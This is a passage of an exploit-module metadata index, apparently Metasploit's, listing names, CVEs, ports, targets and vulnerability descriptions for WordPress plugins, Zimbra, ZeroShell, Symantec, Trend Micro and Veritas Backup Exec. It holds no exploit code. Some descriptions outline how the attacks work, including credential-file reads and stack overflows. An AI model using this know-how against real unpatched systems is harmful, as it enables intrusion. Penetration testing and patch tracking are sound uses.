8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Wordpress 3.5"
],
"mod_time": "2018-08-20 16:05:58 +0000",
"path": "/modules/exploits/unix/webapp/wp_total_cache_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_total_cache_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_worktheflow_upload": {
"name": "Wordpress Work The Flow Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_worktheflow_upload",
"rank": 600,
"disclosure_date": "2015-03-14",
"type": "exploit",
"author": [
"Claudio Viviani",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin,\n version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"WPVDB-7883",
"EDB-36640",
"PACKETSTORM-131294"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Work The Flow 2.5.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_worktheflow_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_worktheflow_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_wpshop_ecommerce_file_upload": {
"name": "WordPress WPshop eCommerce Arbitrary File Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_wpshop_ecommerce_file_upload",
"rank": 600,
"disclosure_date": "2015-03-09",
"type": "exploit",
"author": [
"g0blin",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin\n from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote\n code execution. This module has been tested successfully on WordPress WPshop eCommerce\n 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.",
"references": [
"WPVDB-7830",
"URL-https://research.g0blin.co.uk/g0blin-00036/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WPshop eCommerce 1.3.9.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_wpshop_ecommerce_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_wptouch_file_upload": {
"name": "WordPress WPTouch Authenticated File Upload",
"full_name": "exploit/unix/webapp/wp_wptouch_file_upload",
"rank": 600,
"disclosure_date": "2014-07-14",
"type": "exploit",
"author": [
"Marc-Alexandre Montpas",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "The WordPress WPTouch plugin contains an authenticated file upload\n vulnerability. A wp-nonce (CSRF token) is created on the backend index\n page and the same token is used on handling ajax file uploads through\n the plugin. By sending the captured nonce with the upload, we can\n upload arbitrary files to the upload folder. Because the plugin also\n uses its own file upload mechanism instead of the WordPress api it's\n possible to upload any file type.\n The user provided does not need special rights, and users with \"Contributor\"\n role can be abused.",
"references": [
"URL-http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wptouch.html",
"WPVDB-7118"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wptouch < 3.4.3"
],
"mod_time": "2017-09-08 10:04:47 +0000",
"path": "/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_wptouch_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_wysija_newsletters_upload": {
"name": "Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload",
"full_name": "exploit/unix/webapp/wp_wysija_newsletters_upload",
"rank": 600,
"disclosure_date": "2014-07-01",
"type": "exploit",
"author": [
"Marc-Alexandre Montpas",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "The Wordpress plugin \"MailPoet Newsletters\" (wysija-newsletters) before 2.6.8\n is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme\n functionality to upload a zip file containing the payload. The plugin uses the\n admin_init hook, which is also executed for unauthenticated users when accessing\n a specific URL. The first fix for this vulnerability appeared in version 2.6.7,\n but the fix can be bypassed. In PHP's default configuration,\n a POST variable overwrites a GET variable in the $_REQUEST array. The plugin\n uses $_REQUEST to check for access rights. By setting the POST parameter to\n something not beginning with 'wysija_', the check is bypassed. Wordpress uses\n the $_GET array to determine the page, so it is not affected by this. The developers\n applied the fixes to all previous versions too.",
"references": [
"URL-http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html",
"URL-http://www.mailpoet.com/security-update-part-2/",
"URL-https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php",
"WPVDB-6680"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wysija-newsletters < 2.6.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_wysija_newsletters_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/xoda_file_upload": {
"name": "XODA 0.4.5 Arbitrary PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/xoda_file_upload",
"rank": 600,
"disclosure_date": "2012-08-21",
"type": "exploit",
"author": [
"Shai rod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a file upload vulnerability found in XODA 0.4.5. Attackers\n can abuse the \"upload\" command in order to upload a malicious PHP file without any\n authentication, which results in arbitrary code execution. The module has been\n tested successfully on XODA 0.4.5 and Ubuntu 10.04.",
"references": [
"OSVDB-85117",
"BID-55127",
"EDB-20703"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"XODA 0.4.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/xoda_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/xoda_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/zeroshell_exec": {
"name": "ZeroShell Remote Code Execution",
"full_name": "exploit/unix/webapp/zeroshell_exec",
"rank": 600,
"disclosure_date": "2013-09-22",
"type": "exploit",
"author": [
"Yann CAM",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in ZeroShell 2.0 RC2 and lower.\n It will leverage an unauthenticated local file inclusion vulnerability in the\n \"/cgi-bin/kerbynet\" url. The file retrieved is \"/var/register/system/ldap/rootpw\".\n This file contains the admin password in cleartext. The password is used to login\n as the admin user. After the authentication process is complete it will use the\n RunScript action to execute the payload with root privileges.",
"references": [
"CVE-2009-0545",
"PACKETSTORM-122799"
],
"platform": "Linux",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ZeroShell 2.0 RC2"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/webapp/zeroshell_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/zeroshell_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/zimbra_lfi": {
"name": "Zimbra Collaboration Server LFI",
"full_name": "exploit/unix/webapp/zimbra_lfi",
"rank": 600,
"disclosure_date": "2013-12-06",
"type": "exploit",
"author": [
"rubina119",
"Mekanismen <mattias@gotroot.eu>"
],
"description": "This module exploits a local file inclusion on Zimbra 8.0.2 and 7.2.2. The vulnerability\n allows an attacker to get the LDAP credentials from the localconfig.xml file. The stolen\n credentials allow the attacker to make requests to the service/admin/soap API. This can\n then be used to create an authentication token for the admin web interface. This access\n can be used to achieve remote code execution. This module has been tested on Zimbra\n Collaboration Server 8.0.2 with Ubuntu Server 12.04.",
"references": [
"CVE-2013-7091",
"OSVDB-100747",
"BID-64149",
"EDB-30085",
"URL-http://cxsecurity.com/issue/WLB-2013120097"
],
"platform": "Linux",
"arch": "",
"rport": 7071,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Zimbra 8.0.2 / Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/zimbra_lfi.rb",
"is_install_path": true,
"ref_name": "unix/webapp/zimbra_lfi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/zoneminder_packagecontrol_exec": {
"name": "ZoneMinder Video Server packageControl Command Execution",
"full_name": "exploit/unix/webapp/zoneminder_packagecontrol_exec",
"rank": 600,
"disclosure_date": "2013-01-22",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command execution vulnerability in ZoneMinder Video\n Server version 1.24.0 to 1.25.0 which could be abused to allow\n authenticated users to execute arbitrary commands under the context of the\n web server user. The 'packageControl' function in the\n 'includes/actions.php' file calls 'exec()' with user controlled data\n from the 'runState' parameter.",
"references": [
"CVE-2013-0232",
"OSVDB-89529",
"EDB-24310",
"URL-http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/zoneminder_packagecontrol_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/zpanel_username_exec": {
"name": "ZPanel 10.0.0.2 htpasswd Module Username Command Execution",
"full_name": "exploit/unix/webapp/zpanel_username_exec",
"rank": 600,
"disclosure_date": "2013-06-07",
"type": "exploit",
"author": [
"shachibista",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in ZPanel's htpasswd module. When\n creating .htaccess using the htpasswd module, the username field can be used to\n inject system commands, which is passed on to a system() function for executing\n the system's htpasswd command.\n\n Please note: In order to use this module, you must have a valid account to login\n to ZPanel. An account part of any of the default groups should suffice, such as:\n Administrators, Resellers, or Users (Clients). By default, there's already a\n 'zadmin' user, but the password is randomly generated.",
"references": [
"OSVDB-94038",
"URL-https://github.com/bobsta63/zpanelx/commit/fe9cec7a8164801e2b3755b7abeabdd607f97906",
"URL-http://forums.zpanelcp.com/showthread.php?27898-Serious-Remote-Execution-Exploit-in-Zpanel-10-0-0-2"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ZPanel 10.0.0.2 on Linux"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/unix/webapp/zpanel_username_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/zpanel_username_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/x11/x11_keyboard_exec": {
"name": "X11 Keyboard Command Injection",
"full_name": "exploit/unix/x11/x11_keyboard_exec",
"rank": 600,
"disclosure_date": "2015-07-10",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits open X11 servers by connecting and registering a\n virtual keyboard. The virtual keyboard is used to open an xterm or gnome\n terminal and type and execute the specified payload.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": 6000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"xterm (Generic)",
"gnome-terminal (Ubuntu)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/x11/x11_keyboard_exec.rb",
"is_install_path": true,
"ref_name": "unix/x11/x11_keyboard_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/ams_hndlrsvc": {
"name": "Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution",
"full_name": "exploit/windows/antivirus/ams_hndlrsvc",
"rank": 600,
"disclosure_date": "2010-07-26",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "Symantec System Center Alert Management System is prone to a\n remote command-injection vulnerability because the application fails\n to properly sanitize user-supplied input.",
"references": [
"OSVDB-66807",
"BID-41959",
"URL-http://www.foofus.net/~spider/code/AMS2_072610.txt"
],
"platform": "Windows",
"arch": "",
"rport": 38292,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/ams_hndlrsvc.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/ams_hndlrsvc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/ams_xfr": {
"name": "Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution",
"full_name": "exploit/windows/antivirus/ams_xfr",
"rank": 600,
"disclosure_date": "2009-04-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "Symantec System Center Alert Management System is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.",
"references": [
"CVE-2009-1429",
"BID-34671",
"OSVDB-54157",
"ZDI-09-060",
"URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02"
],
"platform": "Windows",
"arch": "",
"rport": 12174,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/ams_xfr.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/ams_xfr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/symantec_endpoint_manager_rce": {
"name": "Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution",
"full_name": "exploit/windows/antivirus/symantec_endpoint_manager_rce",
"rank": 600,
"disclosure_date": "2014-02-24",
"type": "exploit",
"author": [
"Stefan Viehbock",
"Chris Graham",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager\n versions 11.0, 12.0 and 12.1. When supplying a specially crafted XML external entity (XXE) request an attacker\n can reach SQL injection affected components. As xp_cmdshell is enabled in the included\n database instance, it's possible to execute arbitrary system commands on the target\n with SYSTEM privileges.",
"references": [
"CVE-2013-5014",
"CVE-2013-5015",
"OSVDB-103305",
"OSVDB-103306",
"EDB-31853",
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows VBS Stager"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/symantec_endpoint_manager_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/symantec_iao": {
"name": "Symantec Alert Management System Intel Alert Originator Service Buffer Overflow",
"full_name": "exploit/windows/antivirus/symantec_iao",
"rank": 400,
"disclosure_date": "2009-04-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Intel Alert Originator Service msgsys.exe.\n When an attacker sends a specially crafted alert, arbitrary code may be executed.",
"references": [
"CVE-2009-1430",
"OSVDB-54159",
"BID-34674"
],
"platform": "Windows",
"arch": "",
"rport": 38292,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003",
"Windows 2000 All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/symantec_iao.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/symantec_iao",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/symantec_rtvscan": {
"name": "Symantec Remote Management Buffer Overflow",
"full_name": "exploit/windows/antivirus/symantec_rtvscan",
"rank": 400,
"disclosure_date": "2006-05-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Symantec Client Security 3.0.x.\n This module has only been tested against Symantec Client Security 3.0.2\n build 10.0.2.2000.",
"references": [
"CVE-2006-2630",
"OSVDB-25846",
"BID-18107",
"URL-http://research.eeye.com/html/advisories/published/AD20060612.html"
],
"platform": "Windows",
"arch": "",
"rport": 2967,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SCS 3.0.2 build 10.0.2.2000"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/symantec_rtvscan.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/symantec_rtvscan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/symantec_workspace_streaming_exec": {
"name": "Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload",
"full_name": "exploit/windows/antivirus/symantec_workspace_streaming_exec",
"rank": 600,
"disclosure_date": "2014-05-12",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in Symantec Workspace Streaming. The\n vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the\n as_agent.exe service, which allows for uploading arbitrary files under the server root.\n This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order\n to achieve remote code execution. This module has been tested successfully on Symantec\n Workspace Streaming 6.1 SP8 and Windows 2003 SP2, and reported to affect 7.5.0.x.\n Abused services listen on a single-machine deployment and also in the backend role in\n a multiple-machine deployment.",
"references": [
"CVE-2014-1649",
"OSVDB-106923",
"BID-67189",
"ZDI-14-127",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00"
],
"platform": "Java",
"arch": "java",
"rport": 9855,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Workspace Streaming 6.1 SP8 / Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/symantec_workspace_streaming_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/trendmicro_serverprotect": {
"name": "Trend Micro ServerProtect 5.58 Buffer Overflow",
"full_name": "exploit/windows/antivirus/trendmicro_serverprotect",
"rank": 400,
"disclosure_date": "2007-02-20",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.\n By sending a specially crafted RPC request, an attacker could overflow the\n buffer and execute arbitrary code.",
"references": [
"CVE-2007-1070",
"OSVDB-33042",
"BID-22639"
],
"platform": "Windows",
"arch": "",
"rport": 5168,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Trend Micro ServerProtect 5.58 Build 1060"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/trendmicro_serverprotect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/trendmicro_serverprotect_createbinding": {
"name": "Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow",
"full_name": "exploit/windows/antivirus/trendmicro_serverprotect_createbinding",
"rank": 400,
"disclosure_date": "2007-05-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.\n By sending a specially crafted RPC request, an attacker could overflow the\n buffer and execute arbitrary code.",
"references": [
"CVE-2007-2508",
"OSVDB-35790",
"BID-23868"
],
"platform": "Windows",
"arch": "",
"rport": 5168,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Trend Micro ServerProtect 5.58 Build 1060"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/trendmicro_serverprotect_createbinding",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/antivirus/trendmicro_serverprotect_earthagent": {
"name": "Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow",
"full_name": "exploit/windows/antivirus/trendmicro_serverprotect_earthagent",
"rank": 400,
"disclosure_date": "2007-05-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060\n EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the\n buffer and execute arbitrary code.",
"references": [
"CVE-2007-2508",
"OSVDB-35789",
"BID-23866"
],
"platform": "Windows",
"arch": "",
"rport": 3628,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Trend Micro ServerProtect 5.58 Build 1060"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb",
"is_install_path": true,
"ref_name": "windows/antivirus/trendmicro_serverprotect_earthagent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/arkeia/type77": {
"name": "Arkeia Backup Client Type 77 Overflow (Win32)",
"full_name": "exploit/windows/arkeia/type77",
"rank": 400,
"disclosure_date": "2005-02-18",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the Arkeia backup\n client for the Windows platform. This vulnerability affects\n all versions up to and including 5.3.3.",
"references": [
"CVE-2005-0491",
"OSVDB-14011",
"BID-12594",
"URL-http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html"
],
"platform": "Windows",
"arch": "",
"rport": 617,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Arkeia 5.3.3 and 5.2.27 Windows (All)",
"Arkeia 5.2.27 and 5.1.19 Windows (All)",
"Arkeia 5.3.3 and 5.0.19 Windows (All)",
"Arkeia 5.1.19 and 5.0.19 Windows (All)",
"Arkeia 5.x Windows 2000 English",
"Arkeia 5.x Windows XP English SP0/SP1",
"Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6",
"Arkeia 4.2 Windows 2000 English",
"Arkeia 4.2 Windows XP English SP0/SP1",
"Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6",
"Arkeia 4.2 Windows 2000 German"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/arkeia/type77.rb",
"is_install_path": true,
"ref_name": "windows/arkeia/type77",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/backdoor/energizer_duo_payload": {
"name": "Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution",
"full_name": "exploit/windows/backdoor/energizer_duo_payload",
"rank": 600,
"disclosure_date": "2010-03-05",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module will execute an arbitrary payload against\n any system infected with the Arugizer trojan horse. This\n backdoor was shipped with the software package accompanying\n the Energizer DUO USB battery charger.",
"references": [
"CVE-2010-0103",
"OSVDB-62782",
"US-CERT-VU-154421"
],
"platform": "Windows",
"arch": "",
"rport": 7777,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/backdoor/energizer_duo_payload.rb",
"is_install_path": true,
"ref_name": "windows/backdoor/energizer_duo_payload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/backupexec/name_service": {
"name": "Veritas Backup Exec Name Service Overflow",
"full_name": "exploit/windows/backupexec/name_service",
"rank": 200,
"disclosure_date": "2004-12-16",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the Veritas Backup\n Exec Agent Browser service. This vulnerability occurs when a\n recv() call has a length value too long for the\tdestination\n stack buffer. By sending an agent name value of 63 bytes or\n more, we can overwrite the return address of the recv\n function. Since we only have ~60 bytes of contiguous space\n for shellcode, a tiny findsock payload is sent which uses a\n hardcoded IAT address for the recv() function. This payload\n will then roll the stack back to the beginning of the page,\n recv() the real shellcode into it, and jump to it. This\n module has been tested against Veritas 9.1 SP0, 9.1 SP1, and\n 8.6.",
"references": [
"CVE-2004-1172",
"OSVDB-12418",
"BID-11974",
"URL-http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": 6101,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Veritas BE 9.1 SP0/SP1",
"Veritas BE 8.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/backupexec/name_service.rb",
"is_install_path": true,
"ref_name": "windows/backupexec/name_service",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/backupexec/remote_agent": {
"name": "Veritas Backup Exec Windows Remote Agent Overflow",
"full_name": "exploit/windows/backupexec/remote_agent",
"rank": 500,
"disclosure_date": "2005-06-22",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the Veritas\n BackupExec Windows Agent software. This vulnerability occurs\n when a client authentication request is received with type\n '3' and a long password argument. Reliable execution is\n obtained by abusing the stack buffer overflow to smash a SEH\n pointer.",
"references": [
"CVE-2005-0773",
"OSVDB-17624",
"BID-14022",
"URL-http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": 10000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Veritas BE 9.0/9.1/10.0 (All Windows)",
"Veritas BE 9.0/9.1/10.0 (Windows 2000)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/backupexec/remote_agent.rb",
"is_install_path": true,
"ref_name": "windows/backupexec/remote_agent",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/backupexec/ssl_uaf": {
"name": "Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free",
"full_name": "exploit/windows/backupexec/ssl_uaf",
"rank": 300,
"disclosure_date": "2017-05-10",
"type": "exploit",
"author": [
"Matthew Daley"
],
"description": "This module exploits a use-after-free vulnerability in the handling of SSL NDMP\n connections in Veritas/Symantec Backup Exec's Remote Agent for Windows. When SSL\n is re-established on a NDMP connection that previously has had SSL established,\n the BIO struct for the connection's previous SSL session is reused, even though it\n has previously been freed.\n\n This module supports 3 specific versions of the Backup Exec agent in the 14, 15\n and 16 series on 64-bit and 32-bit versions of Windows and has been tested from\n Vista to Windows 10. The check command can help narrow down what major and minor\n revision is installed and the precise of version of Windows, but some other\n information may be required to make a reliable choice of target.\n\n NX, ASLR and Windows 8+ anti-ROP mitigations are bypassed. On Windows 8+, it has a\n reliability of around 85%. On other versions of Windows, reliability is around 35%\n (due to the need to win a race condition across the network in this case; this may\n drop further depending on network conditions). The agent is normally installed on\n all hosts in a domain that need to be backed up, so if one service crashes, try\n again on another :) Successful exploitation will give remote code execution as the\n user of the Backup Exec Remote Agent for Windows service, almost always\n NT AUTHORITY\\SYSTEM.",
"references": [
"CVE-2017-8895",
"VTS-17-006",
"URL-https://www.veritas.com/content/support/en_US/security/VTS17-006.html"
],
"platform": "Windows",
"arch": "",
"rport": 10000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x64",
"Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x86",
"Backup Exec 14 (14.1 / revision 9.1), Windows <= 7 x64",
"Backup Exec 14 (14.1 / revision 9.1), Windows <= 7 x86",
"Backup Exec 15 (14.2 / revision 9.2), Windows >= 8 x64",
"Backup Exec 15 (14.2 / revision 9.2), Windows >= 8 x86",
"Backup Exec 15 (14.2 / revision 9.2), Windows <= 7 x64",
"Backup Exec 15 (14.2 / revision 9.2), Windows <= 7 x86",
"Backup Exec 16 (16.0 / revision 9.2), Windows >= 8 x64",
"Backup Exec 16 (16.0 / revision 9.2), Windows >= 8 x86",
